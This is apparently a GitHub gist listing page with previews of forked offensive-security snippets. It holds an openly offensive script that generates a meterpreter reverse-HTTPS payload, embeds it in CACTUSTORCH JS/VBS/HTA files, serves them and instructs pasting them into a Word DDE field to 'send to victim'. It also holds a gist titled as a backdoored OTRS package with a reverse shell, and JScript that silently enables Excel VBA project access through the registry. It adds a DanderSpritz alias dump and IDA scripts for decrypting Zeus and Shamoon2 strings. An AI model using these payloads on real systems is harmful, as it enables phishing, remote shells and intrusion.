I hereby claim:
- I am kaicastledine on github.
- I am kcsec (https://keybase.io/kcsec) on keybase.
- I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao
To claim this, I am signing this object:
Kaicastledine
Kaicastledine
/ CactusTorchDDEAUTO.sh
Created
October 23, 2017 07:53
— forked from xillwillx/CactusTorchDDEAUTO.sh
CactusTorchDDEAUTO
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
| IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
| msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
| PAYLOAD=$(cat payload.bin | base64 -w 0) | |
| sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
| cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
| service apache2 start | |
| echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
Kaicastledine
/ MyPackage.opm
Created
September 2, 2017 15:08
— forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" ?> | |
| <otrs_package version="1.1"> | |
| <Name>MyModule</Name> | |
| <Version>1.0.0</Version> | |
| <Vendor>My Module</Vendor> | |
| <URL>http://otrs.org/</URL> | |
| <License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
| <ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
| <Description Lang="en">MyModule</Description> | |
| <Framework>5.x.x</Framework> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| var objExcel = new ActiveXObject("Excel.Application"); | |
| objExcel.Visible = false; | |
| var WshShell = new ActiveXObject("WScript.Shell"); | |
| var Application_Version = objExcel.Version;//Auto-Detect Version | |
| var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
| WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
| var objWorkbook = objExcel.Workbooks.Add(); |
Kaicastledine
/ keybase.md
Created
July 4, 2017 14:58
Kaicastledine
/ aliases-dsz
Created
April 18, 2017 10:35
— forked from misterch0c/aliases-dsz
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 21:25:59>> aliases | |
| [21:25:59] ID: 331 'aliases' started [target: z0.0.0.1] | |
| acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%% | |
| acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%% | |
| arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
| arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
| channels : LOCAL : commands %%cmd_args%% | |
| channels : ANY_REMOTE : commands %%cmd_args%% | |
| checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops | |
| checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops |
Kaicastledine
/ Rulz.py
Created
April 4, 2017 08:55
— forked from monoxgas/Rulz.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Rulz.py | |
| # Author: Nick Landers (@monoxgas) - Silent Break Security | |
| import os | |
| import sys | |
| import argparse | |
| import re | |
| import binascii | |
| import codecs |
Kaicastledine
/ decrypt_zeus.py
Created
February 14, 2017 15:08
— forked from coldshell/decrypt_zeus.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def decrypt(func): | |
| """ | |
| Decryption of zeus strings | |
| """ | |
| ZBOT_INDEX_MIN = 0x0 | |
| ZBOT_INDEX_MAX = 0xe7 | |
| data = {} | |
| for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX): | |
Kaicastledine
/ decrypt_shamoon2.py
Created
February 14, 2017 15:08
— forked from coldshell/decrypt_shamoon2.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idc | |
| def decrypt_n_comment(func, func_name): | |
| """ | |
| Decrypt and comment Shamoon2's strings | |
| """ | |
| data = {} | |
| for xref in XrefsTo(LocByName(func_name)): | |
| # init |
NewerOlder